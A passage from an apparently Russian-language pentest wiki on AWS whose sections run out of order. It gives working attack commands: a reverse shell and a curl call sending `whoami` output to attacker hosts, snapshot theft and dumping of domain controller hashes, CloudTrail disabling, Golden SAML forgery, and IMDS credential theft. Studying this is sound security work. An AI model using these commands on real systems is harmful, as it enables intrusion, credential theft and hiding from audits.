$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
</syntaxhighlight>

==== EC2:CreateSnapshot + Active Directory ====

См. AD.

== Auto Scaling (autoscaling) ==

Сервис для масштабирования приложений. Работает преимущественно с EC2, ECS, DynamoDB (таблицы и индексы) и Aurora.

Для работы сервиса требуется:

1. Конфигурация запуска EC2.

2. Конфигурация масштабирования.

== Роли - повышение привилегий ==

=== autoscaling:CreateLaunchConfiguration + autoscaling:Create(Update)AutoScalingGroup + iam:PassRole ===

Позволяет создать и запустить конфигурацию масштабирования.

==== Создаем конфигурацию запуска EC2 ====

Для создания требуется:

1. Image-id

2. iam-instance-profile

Следующая команда создает конфигурацию с командой из файла reverse-shell.sh:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-launch-configuration --launch-configuration-name demo3-LC --image-id ami-0f90b6b11936e1083 --instance-type t1.micro --iam-instance-profile demo-EC2Admin --metadata-options "HttpEndpoint=enabled,HttpTokens=optional" --associate-public-ip-address --user-data=file://reverse-shell.sh
</syntaxhighlight>

Пример содержимого reverse-shell.sh:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
#!/bin/bash
/bin/bash -l > /dev/tcp/atk.attacker.xyz/443 0<&1 2>&1
</syntaxhighlight>

==== Создаем и запускаем группу масштабируемости ====

Привилегия ec2:DescribeSubnets нужна для выбора нужной сети (чтобы EC2 смог сделать reverse-соедиенение к нам).

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-auto-scaling-group --auto-scaling-group-name demo3-ASG --launch-configuration-name demo3-LC --min-size 1 --max-size 1 --vpc-zone-identifier "subnet-aaaabbb"
</syntaxhighlight>

Подробнее тут https://notdodo.medium.com/aws-ec2-auto-scaling-privilege-escalation-d518f8e7f91b

== AD (Directory Service) ==

Второе название - AWS Managed Microsoft Active Directory. Позволяет использовать Active Directory в AWS.

Основные понятия:

* EC2-Instance - VPS на которых крутится весь Active Directory

=== Роли - повышение привилегий ===

==== EC2:CreateSnapshot + EC2:RunInstance -> ShadowCopy ====

Позволяет провести атаку ShadowCopy на доменный контроллер и считать учетные данные всех пользователей.

Последовательность атаки:

1. Получаем список инстансов

2. Создаем Snapshot выбранного сервера

3. Редактируем атрибуты у SnapShot для доступа с аккаунта атакующего.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 modify-snapshot-attribute --snapshot-id snap-1234567890abcdef0 --attribute createVolumePermission --operation-type remove --user-ids 123456789012
</syntaxhighlight>

4. Переключаемся на аккаунт атакующего

5. Создаем новый Linux EC2-инстанс, к которому будет прикреплен SnapShot

6. Подключаемся по SSH и получаем данные из SnapShot
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sudo -s
mkdir /tmp/windows
mount /dev/xvdf1 /tmp/windows/
cd /tmp/windows/
</syntaxhighlight>

7. Работаем с данными на примонтированном диске, который будет в /tmp/windows/. Пример команд для извлечения ntds.dit:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
cp /windows/Windows/NTDS/ntds.dit /home/ec2-user
cp /windows/Windows/System32/config/SYSTEM /home/ec2-user
chown ec2-user:ec2-user /home/ec2-user/*
# Sftp - скачиваем файлы:
/home/ec2-user/SYSTEM
/home/ec2-user/ntds.dit
# Получаем учетные данные, используя Impacket-secretsdump
secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets
</syntaxhighlight>

== CloudTrail ==

Сервис для аудита событий в AWS-аккаунте (включен в каждом аккаунте по-умолчанию). Сервис позволяет вести журналы, осуществлять непрерывный мониторинг и сохранять информацию об истории аккаунта в пределах всей используемой инфраструктуры AWS.

Записывает:

* API-вызовы

* Логины в систему

* События сервисов

* ???

Важен при операциях RedTeam.

Название файла логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
AccountID_CloudTrail_RegionName_YYYYMMDDTHHmmZ_UniqueString.FileNameFormat
</syntaxhighlight>

S3 путь до логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
BucketName/prefix/AWSLogs/AccountID/CloudTrail/RegionName/YYYY/MM/DD
</syntaxhighlight>

Путь у CloudTrail-Digest файлов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
s3://s3-bucket-name/optional-prefix/AWSLogs/aws-account-id/CloudTrail-Digest/region/digest-end-year/digest-end-month/digest-end-data/aws-account-id_CloudTrail-Digest_region_trail-name_region_digest_end_timestamp.json.gz
</syntaxhighlight>

Основные поля у событий:

* eventName - имя API-endpoint

* eventSource - вызванный сервис

* eventTime - время события

* SourceIPAddress - ip-адрес источника

* userAgent - метод запроса
** "signing.amazonaws.com" - запрос от AWS Management Console
** "console.amazonaws.com" - запрос от root-пользователя аккаунта
** "lambda.amazonaws.com" - запрос от AWS Lambda

* requestParameters - параметры запроса

* responseElements - элементы ответа.

Временные параметры:

* 5 минут - сохраняется новый лог-файл

* 15 минут - сохраняется в S3.

Важно! Сохраняется чексумма файлов, поэтому пользователи могут удостовериться что логи не менялись.
Также логи могут уходить напрямую в CloudWatch - администраторам может прилететь уведомление об ИБ-инцидентах. Или события могут быть проанализированы внутренним модулем CloudTrail - Insights на предмет необычной активности.

=== Роли - управление ===

==== cloudtrail:DeleteTrail ====

Позволяет отключить мониторинг:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator
</syntaxhighlight>

==== cloudtrail:UpdateTrail ====

Права на редактирование правил монитринга.

Отключить мониторинг глобальных сервисов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event
</syntaxhighlight>

Отключить мониторинг на конкретные регионы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
</syntaxhighlight>

==== validate-logs ====

Проверить, были ли изменены логи.

aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]

=== Эксплуатация ===

==== Обход правила по UserAgent ====

На сервисе есть правило, по которому определяет, что запросы были сделаны с kali/parrot/pentoo используя awscli.

Для этого можно воспользоваться утилитой pacu, которая автоматически подменяет useragent. Использование утилиты в конце статьи.

== DynamoDB ==

Cистема управления базами данных класса NoSQL в формате «ключ — значение».

=== Роли - управление ===

==== dynamodb:ListTables ====

Позволяет посмотреть спрсок таблиц базы данных.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb list-tables

{
"TableNames": [
"users"
]
}
</syntaxhighlight>

==== dynamodb:Scan ====

Получение обьектов из базы данных:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]'

{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
}
</syntaxhighlight>

== ES (ElasticSearch) ==

ElasticSearch от AWS. Используется для просмотра логов/журналов, поиска на вебсайте и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.es.amazonaws.com
</syntaxhighlight>

== ELB (Elastic Load Balancing) ==

Балансировщик нагрузки.

Формат ссылки (elb_v1):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443
</syntaxhighlight>

Формат ссылки (elb_v2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.elb.amazonaws.com
</syntaxhighlight>

== RDS (Relational Database Service) ==

Облачная реляционная база данных (на выбор).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306
postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432
</syntaxhighlight>

== Route 53 ==

Настраиваемая служба DNS.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
{user_provided}
</syntaxhighlight>

== API Gateway ==

API-сервис, который будет доступен почти со всех серверов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{restapi_id}.execute-api.{region}.amazonaws.com/{stage_name}/
https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided}
</syntaxhighlight>

== CloudSearch ==

Альтернатива сервису ElasticSearch. Система для упрощения поиска для администрирования и, например, на вебсайте.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com
</syntaxhighlight>

== Transfer Family ==

Группа сервисов для передачи файлов (S3/EFS) по (SFTP, FTPS, FTP).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sftp://s-{random_id}.server.transfer.{region}.amazonaws.com
ftps://s-{random_id}.server.transfer.{region}.amazonaws.com
ftp://s-{random_id}.server.transfer.{region}.amazonaws.com
</syntaxhighlight>

== IoT (Internet Of Things) ==

Сервис для управления IoT-устройствами.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mqtt://{random_id}.iot.{region}.amazonaws.com:8883
https://{random_id}.iot.{region}.amazonaws.com:8443
https://{random_id}.iot.{region}.amazonaws.com:443
</syntaxhighlight>

== MQ ==

Сервис брокера сообщений для Apache ActiveMQ & RabbitMQ.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162
ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617
</syntaxhighlight>

== MSK (Managed Streaming for Apache Kafka) ==

Сервис потоковой передачи данных в Apache Kafka.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com
{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com
</syntaxhighlight>

== Cloud9 ==

Облачная интегрированная среда разработки(IDE) используя только браузер.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.vfs.cloud9.{region}.amazonaws.com
</syntaxhighlight>

== MediaStore ==

Cервис хранилища AWS, оптимизированный для мультимедийных материалов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.data.mediastore.{region}.amazonaws.com
</syntaxhighlight>

== Kinesis Video Streams ==

Обеспечивает простую и безопасную потоковую передачу видео с подключенных устройств в AWS для воспроизведения, аналитики, машинного обучения (ML) и других видов обработки.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.kinesisvideo.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaConvert ==

Сервис перекодирования видеофайлов с возможностями на уровне вещательных компаний. Он позволяет просто создавать контент в формате «видео по требованию» (VOD) для трансляций, в том числе мультиэкранных, в любом масштабе.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediaconvert.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaPackage ==

Cервис для подготовки и защиты видеоконтента, распространяемого через Интернет. AWS Elemental MediaPackage использует один источник видео и создает на его основе специализированные видеопотоки для воспроизведения на подключенных телевизорах, мобильных телефонах, компьютерах, планшетах и игровых консолях.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel
</syntaxhighlight>

== ECR (Elastic Container Registry) ==

Региональный сервис, предназначенный для обеспечения гибкого развертывания образов.

=== Роли - управление ===

==== ecr:ListImages ====

Получить список образов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr list-images --repository-name <ECR_name> --registry-id <UserID> --region <region> --profile <profile_name>
</syntaxhighlight>

==== ecr:GetDownloadUrlForLayer ====

Позволяет получить URL на скачивание образа.

==== ecr:GetDownloadUrlForLayer + ecr:BatchGetImage + ecr:GetAuthorizationToken ====

Позволяет скачать образ (мб потребуется и ecr:ListImages чтобы получить список образов):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr get-login
docker pull <UserID>.dkr.ecr.us-east-1.amazonaws.com/<ECRName>:latest
docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0
</syntaxhighlight>

== Augmented AI (Amazon A2I) ==

Предоставляет интерфейс для обработки человеком предварительных результатов, полученных с помощью машинного обучения.

[[File:A2i.png|1000px]]

Данные сохраняются в S3, а также к задаче прикрепляется IAM-роль .

При создании задачи разделяется на 3 варианта:

* Textract - извлечение пары ключ-значение из текста

* Rekognition - определение того, что изображено на фото. Например, чтобы оградить от 18+ контента.

* Custom - пользовательский вариант

Интересный факт - использует "Quill Rich Text Editor" для текста с инструкциями. То есть, если в нем будет уязвимость, то можно проверить амазон тоже.

https://aws.amazon.com/ru/augmented-ai/

Также у сервиса есть Workers - сервера, выполняющие кучу тасков. Они могут быть трех типов:

1. Amazon Mechanical Turk - тупо сервера Amazon, за которые надо платить.

2. Private - юзают если обрабатывают приватную инфу или задачи, не поддерживаемые первым пунктом (ну или регион не поддерживается). Это команды, которые имеют доступ к данным и которые могут запускать задачи. Команды менеджарятся с Amazon Cognito.

3. Vendor - решения сторонних разработчиков.

=== Роли ===

==== AmazonAugmentedAIIntegratedAPIAccess ====

Дает доступ к Augmented AI Runtime, Amazon Rekognition или Amazon Textract API.

TODO: проверить, дает ли это еще возможностей злоумышленнику

== CodeGuru ==

Автоматизируйте проверку кода и оптимизируйте производительность приложений с помощью рекомендаций на базе машинного обучения

[[File:Aws codeguru.png| 1000px]]

https://aws.amazon.com/ru/codeguru/

Разделяется на следующие части:

- Reviewer - выявляет критические проблемы, уязвимости системы безопасности и трудноуловимые ошибки + дает рекомендации (языки Java и Python) - статикой.

- Profiler - выявление самых дорогостоящих строк, повышение производительности и тд засчет запуска в среде выполнения. Важно особенно для тех, кто платит за время работы скриптов.

Также на странице есть упоминание про их игру - BugBust

https://us-east-1.console.aws.amazon.com/codeguru/bugbust/participant#/

== Comprehend ==

https://aws.amazon.com/ru/comprehend/

Сервис по извлечению ценной информации из текста и работе с ним.

[[File:Aws comprehend.png|1000px]]

Список категорий, на которые может разбить текст, есть на фото выше.

Для пользовательских настроек есть несколько параметров:

- Кастомные классификации

- Кастомные определения вставок в тексте

- Endpoints - для real-time работы. !!! Достаточно дорогой сервис. В месяц берет 1400$ при минимальной сборке, поэтому если злоумышленник сможет запускать в нем Endpoint'ы в большом количестве, то компания обанкротится.

== DevOps Guru ==

https://aws.amazon.com/ru/devops-guru/

Собирает метрики из различных сервисов и детектит различные аномалии. Проще говоря, делает статистику по метрикам и с машинным обучением находит ошибки.

Источники метрик:

* CloudWatch

* AWS Config

* CloudTrail

* X-Ray

Если рассуждать со стороны злоумышленника, то если у него есть доступ к DevOps Guru, то у него также есть AIM-роль "Amazon DevOps Guru_Role" и привилегии на доступ к следующим ресурсам:

* Amazon CloudWatch

* Amazon CloudWatch Events

* Amazon CloudWatch Logs

* AWS CodeDeploy

* AWS CodePipeline

* AWS CloudFormation

* AWS CloudTrail

* AWS Systems Manager

* AWS X-Ray

== Elastic Inference ==

https://aws.amazon.com/machine-learning/elastic-inference/

== Forecast ==

Служба прогнозирования временных рядов используя машинное обучение (предсказывание последующих событий).

https://aws.amazon.com/ru/forecast/

При настройке можно выбрать один из forecasting-доменов:

* Retail

* Custom

* Inventory planning

* EC2 capacity

* Work force

* Web traffic

* Metrics

Формально это шаблоны для быстрой настройки сервиса.

Если у атакующего есть привилегии данного сервиса, то можно предположить, что он тоже может получать те же данные (например, количество трафика), что и сам сервис

== Fraud Detector ==

https://aws.amazon.com/ru/fraud-detector/

== HealthLake ==

https://aws.amazon.com/healthlake/

== Kendra ==

https://aws.amazon.com/kendra/?did=ap_card&trk=ap_card

== Lex ==

https://aws.amazon.com/lex/?did=ap_card&trk=ap_card

== Lookout for Equipment ==

https://aws.amazon.com/ru/lookout-for-equipment/

== Lookout for Metrics ==

https://aws.amazon.com/lookout-for-metrics/

== Lookout for Vision ==

https://aws.amazon.com/lookout-for-vision/

== Monitron ==

https://aws.amazon.com/monitron/

== Personalize ==

https://aws.amazon.com/personalize/

== Polly ==

https://aws.amazon.com/polly/

== Rekognition ==

https://aws.amazon.com/rekognition/

== SageMaker ==

https://aws.amazon.com/sagemaker/

== SageMaker Ground Truth ==

https://aws.amazon.com/sagemaker/groundtruth/

== Textract ==

https://aws.amazon.com/textract/

== Transcribe ==

https://aws.amazon.com/transcribe/

== Translate ==

https://aws.amazon.com/translate/

== Apache MXNet ==

https://aws.amazon.com/ru/mxnet/

== Deep Learning Containers ==

https://aws.amazon.com/machine-learning/containers/

== DeepComposer ==

https://aws.amazon.com/deepcomposer/

== DeepLens ==

https://aws.amazon.com/deeplens/

== DeepRacer ==

https://aws.amazon.com/deepracer/

== Inferentia ==

https://aws.amazon.com/machine-learning/inferentia/

== Panorama ==

https://aws.amazon.com/panorama/

== PyTorch ==

https://aws.amazon.com/pytorch/

== TensorFlow ==

https://aws.amazon.com/tensorflow/

== Deep Learning AMI ==

https://aws.amazon.com/machine-learning/amis/

= Утилиты =

== Вычисление ролей ==

=== enumerate-iam ===
github.com:andresriancho/enumerate-iam.git

== Эксплуатация ==

=== Golden SAML ===

Суть атаки в том, что зная ключ, которым подписываются SAML-запросы, вы можете подделать ответ и получить произвольные привилегии в SSO.

Подробнее про эксплуатацию тут: https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps

==== shimit ====
https://github.com/cyberark/shimit

Установка:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
cd /tmp
python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
git clone https://github.com/cyberark/shimit
cd shmit
python shmit.py
</syntaxhighlight>

В начале потребуется доступ к AD FS аккаунту из персонального хранилища которого украсть приватный ключ ключ.
Сделать это можно используя mimikatz, но в примере сделано через библиотеку Microsoft.Adfs.Powershell и powershell

Пример эксплуатации:
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:auto" >
# Получаем приватный ключ
[System.Convert]::ToBase64String($cer.rawdata)
(Get-ADFSProperties).Identifier.AbsoluteUri
(Get-ADFSRelyingPartyTrust).IssuanceTransformRule

# Получаем инфу о юзерах - выбираем цель
aws iam list-users

# Получаем токен
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012

# Проверяем текущий аккаунт
aws opsworks describe-my-user-profile
</syntaxhighlight>

== Проверки безопасности ==

Для администраторов преимущественно.

=== Zeus ===

https://github.com/DenizParlak/Zeus

== Другое ==

=== aws_consoler ===

https://github.com/NetSPI/aws_consoler

== All-In-One ==

=== pacu ===

https://github.com/RhinoSecurityLabs/pacu

=== ScoutSuite ===

https://github.com/nccgroup/ScoutSuite

=== cloudfox ===

https://github.com/BishopFox/cloudfox

= Ссылки =

== Статьи ==

[https://frichetten.com/blog/hijack-iam-roles-and-avoid-detection/ Hijacking IAM Roles and Avoiding Detection]

[https://frichetten.com/blog/bypass-guardduty-pentest-alerts/ Bypass GuardDuty PenTest Alerts]

[https://frichetten.com/blog/ssm-agent-tomfoolery/ Intercept SSM Agent Communications]

== Лаборатории ==

[https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6 Damn Vulnerable Cloud Application]

[https://github.com/nccgroup/sadcloud SadCloud]

[http://flaws.cloud Flaws]

[http://flaws2.cloud/ Flaws]

[https://xakep.ru/2022/03/21/htb-stacked/ HackTheBox Stacked Writeup]

[https://github.com/RhinoSecurityLabs/cloudgoat CloudGoat]

[https://github.com/nccgroup/sadcloud SadCloud]

[https://www.wellarchitectedlabs.com/security/ AWS Well-Architected Labs]

[https://labs.withsecure.com/publications/attack-detection-fundamentals-2021-aws-lab-1 Attack Detection Fundamentals 2021: AWS - Lab #1]

[https://pentesting.cloud/ Free AWS Security Labs]

== Краткие заметки ==

[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md PayloadAllTheThings]

[https://book.hacktricks.xyz/pentesting/pentesting-web/buckets/aws-s3 hacktricks-s3]

[https://book.hacktricks.xyz/cloud-security/aws-security hacktricks-aws]

[https://learntocloud.guide/#/phase5/README learntocloud(много ссылок)]

== Книги ==

[https://www.amazon.com/dp/1789136725/ Hands-On AWS Penetration Testing with Kali Linux]

Aws

2022-10-17T15:13:47Z

Drakylar: /* DevOps Guru */

AWS - Amazon Web Service. Одна из первых облачных систем, состоящая из многих сервисов, которые при некорректной настройке оставляют дыры в безопасности.

= Организационные моменты =

При проведении тестирования на проникновение, требуется предупредить AWS (составить заявку).

Подробнее тут: https://aws.amazon.com/ru/security/penetration-testing/

= Общие концепции =

== Службы ==

Концепция служб в AWS позволяет автоматизировать многие процессы, включая саму разработку архитектуры.

Это экосистема многих сервисов. И AWS стремится увеличить их количество.

Например, связать сервис сбора логов и сервис по реагированию на инциденты, а результаты класть на сервис S3.

== Регионы ==

AWS разделен на регионы. Часть сервисов кросс-региональные, но большинство привязываются к конкретным регионам.

{| class="wikitable"
|+Регионы AWS
|-
| '''Название региона'''
| '''Endpoint(HTTPS)'''
|-
|us-east-2
|rds.us-east-2.amazonaws.com

rds-fips.us-east-2.api.aws

rds.us-east-2.api.aws

rds-fips.us-east-2.amazonaws.com
|-
|us-east-1
|rds.us-east-1.amazonaws.com

rds-fips.us-east-1.api.aws

rds-fips.us-east-1.amazonaws.com

rds.us-east-1.api.aws
|-
|us-west-1
|rds.us-west-1.amazonaws.com

rds.us-west-1.api.aws

rds-fips.us-west-1.amazonaws.com

rds-fips.us-west-1.api.aws
|-
|us-west-2
|rds.us-west-2.amazonaws.com

rds-fips.us-west-2.amazonaws.com

rds.us-west-2.api.aws

rds-fips.us-west-2.api.aws
|-
|af-south-1
|rds.af-south-1.amazonaws.com

rds.af-south-1.api.aws
|-
|ap-east-1
|rds.ap-east-1.amazonaws.com

rds.ap-east-1.api.aws
|-
|ap-southeast-3
|rds.ap-southeast-3.amazonaws.com
|-
|ap-south-1
|rds.ap-south-1.amazonaws.com

rds.ap-south-1.api.aws
|-
|ap-northeast-3
|rds.ap-northeast-3.amazonaws.com

rds.ap-northeast-3.api.aws
|-
|ap-northeast-2
|rds.ap-northeast-2.amazonaws.com

rds.ap-northeast-2.api.aws
|-
|ap-southeast-1
|rds.ap-southeast-1.amazonaws.com

rds.ap-southeast-1.api.aws
|-
|ap-southeast-2
|rds.ap-southeast-2.amazonaws.com

rds.ap-southeast-2.api.aws
|-
|ap-northeast-1
|rds.ap-northeast-1.amazonaws.com

rds.ap-northeast-1.api.aws
|-
|ca-central-1
|rds.ca-central-1.amazonaws.com

rds.ca-central-1.api.aws

rds-fips.ca-central-1.api.aws

rds-fips.ca-central-1.amazonaws.com
|-
|eu-central-1
|rds.eu-central-1.amazonaws.com

rds.eu-central-1.api.aws
|-
|eu-west-1
|rds.eu-west-1.amazonaws.com

rds.eu-west-1.api.aws
|-
|eu-west-2
|rds.eu-west-2.amazonaws.com

rds.eu-west-2.api.aws
|-
|eu-south-1
|rds.eu-south-1.amazonaws.com

rds.eu-south-1.api.aws
|-
|eu-west-3
|rds.eu-west-3.amazonaws.com

rds.eu-west-3.api.aws
|-
|eu-north-1
|rds.eu-north-1.amazonaws.com

rds.eu-north-1.api.aws
|-
|me-south-1
|rds.me-south-1.amazonaws.com

rds.me-south-1.api.aws
|-
|sa-east-1
|rds.sa-east-1.amazonaws.com

rds.sa-east-1.api.aws
|-
|us-gov-east-1
|rds.us-gov-east-1.amazonaws.com
|-
|us-gov-west-1
|rds.us-gov-west-1.amazonaws.com
|}

Или только регионы (могут пригодиться при переборе):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
us-east-2
us-east-1
us-west-1
us-west-2
af-south-1
ap-east-1
ap-southeast-3
ap-south-1
ap-northeast-3
ap-northeast-2
ap-southeast-1
ap-southeast-2
ap-northeast-1
ca-central-1
eu-central-1
eu-west-1
eu-west-2
eu-south-1
eu-west-3
eu-north-1
me-south-1
sa-east-1
us-gov-east-1
us-gov-west-1
</syntaxhighlight>

== Доступы ==

== Консольная утилита(awscli) ==

Чаще всего для взаимодействия с сервисами AWS вам потребуется консольная утилита awscli.

Утилита работает с настроенными профилями.

=== Файлы ===

==== ~/.aws/credentials ====

Файл с учетными данными профилей. Перефразирую: получив данные из этого файла вы, вероятнее всего, получите контроль над аккаунтами в нем.

У каждого профиля будет указан:

* Access Key ID - 20 случайных букв/цифр в верхнем регистре, часто начинается с "AKIA..."

* Access Key - 40 случайных символов различного регистра.

* Access Token - не всегда указывается

Полный список параметров можно посмотреть тут: https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-files.html#cli-configure-files-settings

Пример содержимого файла (сохранен профиль default):

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
aws_access_key_id=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws_session_token = AQoEXAMPLEH4aoAH0gNCAPyJxz4BlCFFxWNE1OPTgk5TthT+FvwqnKwRcOIfrRh3c/LTo6UDdyJwOOvEVPvLXCrrrUtdnniCEXAMPLE/IvU1dYUg2RVAJBanLiHb4IgRmpRV3zrkuWJOgQs8IZZaIv2BXIa2R4Olgk
</syntaxhighlight>

==== ~/.aws/config ====

Файл с региональными настройками профиля(регион по-умолчанию).
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
region=us-west-2
output=json
</syntaxhighlight>

==== ~/.aws/cli/cache ====

Закешированные учетные данные

==== ~/.aws/sso/cache ====

Закешированные данные Single-Sign-On

=== Команды ===

Общее построение команды выглядит как:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws <название_сервиса> <действие> <дополнительные_аргументы>
</syntaxhighlight>

Примеры:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Вывести все S3-хранилища.
aws s3 ls

# Создание нового пользователя - сервис IAM
aws iam create-user --user-name aws-admin2
</syntaxhighlight>

== IMDS (Instance Metadata Service) ==

Это http API для запросов из EC2. Полезно если, например, у вас есть уязвимость SSRF в EC2.

Есть 2 версии:

*IMDSv1 - версия 1 по-умолчанию, не требует токен.

*IMDSv2 - версия 2, для запросов требуется токен.

Запрос без токена:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
curl http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Запрос с токеном:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Кроме доп. информации можно получить access-token для доступа в AWS с сервисного аккаунта ec2 (только для IMDSv2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# В начале делаем запрос на директорию /security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Потом выбираем нужный аккаунт и делаем запрос на него
http://169.254.169.254/latest/meta-data/iam/security-credentials/test-account
</syntaxhighlight>

Пример ответа:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Code" : "Success",
"LastUpdated" : "2019-12-03T07:15:34Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "xxxxxxxxxxxxxxxxxxx",
"SecretAccessKey" : "xxxxxxxxxxxxxxxxxxxxx",
"Token" : "xxxxxxxxxxxxxxxxxxxxx",
"Expiration" : "2019-12-03T13:50:22Z"
}
</syntaxhighlight>
После чего эти учетные данные можно использовать с awscli.

Другие полезные Endpoint'ы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://169.254.169.254/
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
